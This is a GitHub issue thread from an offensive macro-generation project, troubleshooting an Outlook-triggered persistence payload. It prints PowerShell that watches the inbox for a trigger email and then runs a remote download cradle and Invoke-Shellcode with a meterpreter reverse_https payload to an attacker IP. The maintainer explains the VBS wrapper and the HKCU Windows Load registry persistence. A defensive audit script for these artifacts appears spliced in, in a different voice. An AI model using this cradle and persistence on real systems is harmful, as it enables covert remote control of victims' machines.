enigma0x3/Generate-Macro

outlook persistence

Closed this issue · 9 comments

command to call the

```powershell
{Start-Job -ScriptBlock {$WebClientObject = New-Object Net.WebClient
IEX $WebClientObject.DownloadString('http://goo.gl/yfLfQB')
Invoke-Shellcode -Payload windows/meterpreter/reverse_https -LHOST 192.168.1.98 -LPORT 443 -Force}
}}
```

seems to fail as it doesn't ever call out.

Take a look at the code that the URL in the cradle is pointing to. Invoke-Shellcode was updated and moved. Using the correct one will work.

here is the contents of configuration.ps1

```powershell
While($True){
$olFolderInbox = 6
$outlook = new-object -com outlook.application;
$ns = $outlook.GetNameSpace("MAPI");
$inbox = $ns.GetDefaultFolder($olFolderInbox)
$Emails = $inbox.items
$Emails | foreach {
if( $_.subject -match $TriggerWord)
{Start-Job -ScriptBlock {$WebClientObject = New-Object Net.WebClient
IEX $WebClientObject.DownloadString('https://goo.gl/11XkCQ')
Invoke-Shellcode -Payload windows/meterpreter/reverse_https -LHOST 192.168.1.98 -LPORT 443 -Force}
}}

#This determines how often the script checks in. Lower sleep time == more noise
Start-Sleep -s 10
```

With the script running on the target, are you sending an email from the email account specified as the attacker email address as well as specifying the trigger word you specified as well? All this does is monitor the inbox for an email matching the attacker email address as well as the subject specified.

I currently have it only checking for subject. Yes this is all on a test system. I see that it finds the email and evaluates to true. Does it call one of the other scripts it creates to do the shell? I thought the start job would do that. I could simply be misreading what is happening here. If so please disregard.

Thanks
On May 18, 2015 4:49 PM, "enigma0x3" notifications@github.com wrote:

> With the script running on the target, are you sending an email from the email account specified as the attacker email address as well as specifying the trigger word you specified as well? All this does is monitor the inbox for an email matching the attacker email address as well as the subject specified

I probably should say that even if I remove the check for the email and the downloadstring to DownloadString('http://192.168.1.98/file.ps1') it doesn't call out for the ps1.

I am currently standing up a lab environment to test this. I will comment back after I test it out. Thanks!!

Can you verify that this file exists? C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies\cookies.vbs

This is a VBScript wrapper that executes the configuration powershell file (which contains code to call out). This persistence method creates the VBS file and then a registry entry in HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load. When the user logs in, the registry entry will call that VBS file which will then execute configuration.ps1 (which contains callback code). If the VBS file does exist, can you post the contents of it and maybe try running the .vbs directly?
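For anyone auditing a workstation for the artifacts this comment describes, here is an added, read-only check. It is not code from Generate-Macro or from this thread; it reads the `Load` value under the registry key named above (in the current user's hive) and looks for the `cookies.vbs` wrapper at the path given in the thread. The function name, the `$VbsPath` parameter and the output fields are my own.

```powershell
# Added example: audit the Outlook-persistence artifacts named in the comment above.
# Reads HKCU\...\Windows\Load and checks for the VBS wrapper; nothing on the host is modified.
function Get-LoadKeyPersistence {
    [CmdletBinding()]
    param(
        # Path quoted in the thread; hypothetical parameter so another profile can be audited
        [string]$VbsPath = 'C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies\cookies.vbs'
    )

    $regPath = 'HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Windows'
    $result = [ordered]@{
        LoadValue        = $null   # raw content of the Load value, if set
        LoadTarget       = $null   # file the Load value points at, if any
        LoadTargetExists = $false
        VbsExists        = $false
        VbsContent       = $null   # wrapper contents, so the reviewer can see what it launches
    }

    # Load is a legacy Win.ini-style autostart; on a clean workstation it is normally absent.
    $load = Get-ItemProperty -Path $regPath -Name 'Load' -ErrorAction SilentlyContinue
    if ($load -and $load.Load) {
        $result.LoadValue = $load.Load
        # Strip surrounding quotes and trailing arguments to recover the script/executable path
        # (a quoted path may contain spaces; an unquoted one is taken up to the first space).
        $target = ($load.Load -replace '^"([^"]+)".*$', '$1').Split(' ')[0]
        $result.LoadTarget = $target
        $result.LoadTargetExists = [bool](Test-Path -LiteralPath $target -ErrorAction SilentlyContinue)
    }

    if (Test-Path -LiteralPath $VbsPath) {
        $result.VbsExists  = $true
        $result.VbsContent = Get-Content -LiteralPath $VbsPath -Raw
    }

    [pscustomobject]$result
}

# Usage: any non-empty LoadValue, or an existing VbsPath, deserves a closer look.
Get-LoadKeyPersistence | Format-List
```

Run it in the context of the user whose login is suspected to trigger the wrapper, since the key lives in that user's HKCU hive.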

I remade the file again and again to troubleshoot and I don't know why but now it's working please disregard this to me being crazy or something.